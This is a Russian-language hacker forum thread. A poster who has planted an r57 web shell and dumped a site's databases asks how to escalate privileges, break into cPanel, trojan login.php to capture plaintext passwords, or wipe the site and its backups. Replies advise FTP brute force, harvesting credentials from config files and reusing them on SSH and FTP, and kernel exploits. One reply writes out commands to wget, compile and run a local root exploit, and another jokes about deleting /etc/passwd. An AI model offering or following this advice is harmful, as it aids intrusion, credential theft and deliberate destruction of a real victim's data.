![]() |
Залит шелл, как дальше?
Всем привет.
Дано: залит классический r57, стянуты дампы баз данных, частично расшифрованы. Пароли админов похоже слишком сложные, неделя расшифровки результатов не дала. Посоветуйте, что можно сделать дальше... хотел протроянить login.php форума или сайта, что бы он пароли высылал нешифрованые но шелу не хватает прав. В общем вопрос такой, как повысить шелл в правах либо как при этих условиях взломать cpanel (только не брутфорс, скорее всего не поможет) либо как тупо удалить всё из public_html и каталога выше (полюбому там бэкапы баз есть) Скриптик то у меня для удаления конечно есть, но как ему дать достаточно прав для меня тоже вопрос. И ещё, может быть есть способы открыть фтп? |
Во-первых, в r57 есть функция фтп брута, во-вторых, повысить права скрипта можно двумя способами - либо покопаться в конфигах серва и найти пароли, либо сплойтом, как использовать эксплойт и байнд скрипты, а также бэкконнеты смотри на форуме
|
командную строку вызвать могёшь?
|
uname -a
http://my_lybimii_bug_track.com/sploit/ wget http://my_lybimii_bug_track.com/sploit/1.c gcc 1.c -o haked ./haked id (0)root!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
Цитата:
так что лучше удаляй /etc/passwd |
Да знаю!!Да бы не разводить флейм, надо root или права на Public_html!Кста, а /etc/passwd можно удалить без прав рута, ну ты дал!
|
Цитата:
По части второго, спасибо пищу, почитаю... Цитата:
Цитата:
gcc 1.c -o haked ./haked id ^^^что это означает? Извините по никсу слаб, просто появилась задача, стараюсь её реализовать. Цитата:
|
почитай конфиги сайта, если это не хомяк, то скорее всего есть скрипты для работы с бд ищи в них название конфигурационного файла (config.php,config.inc,config.inc.php,dbconf.php и т.д.) читай этот файл от бд там пароль и логин в чистом виде... пробуй их на другие сервисы на фтп или ssh могут прокатить...
если у тебя будет доступ к базе mysql (хотя врядли если это крутой хостер) то узнавай хеши паролей юзеров бд и бруть их, а потом также пробуй их к ssh и фтп... |
я говорил же.. хэши (и дампы баз) стянул. Пароли админов не расшифровываются.
пароли от конфигов тоже никуда кроме как к базам не подходят. |
Цитата:
в шелле выполни комманду uname -a и результаты в студию |
Я же тебе говорю узнал что там за ось стоит, от этого и отъедь!!!!
|
А какая твоя конечная цель, непойму. Шелл залить, дамп есть.
|
Узнай если ядро не бажное, если да, то сплоит в руки и бери рут!
|
Цитата:
Дампы слиты но пароли админов не подбираются (вероятно просто длинные), так вот в виду невозможности расшифровки необходим полный дестрой =) Просто удалить всё, вместе с бэкапами. Шелу прав на это не хватает. |
uname -a
Linux targetsrv.ru 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 i686 i386 GNU/Linux прошу ЧИТАЙТЕ ВНИМАТЕЛЬНО!!! Я в самом начале говорил что шелл, залил. mysql базы посливал. Пароль которые получилось расшифровать расшифровал. Теперь задача, взять пароль от cpanel либо полный дестрой, папки этого пользователя на хостинге включая бэкапы файлов и public_html И ещё отдельный привет Dronga, держи своё мнение при себе! Ситуации бывают разные. А жизнь вообще тяжела и несправедлива! ;) |
| Время: 20:33 |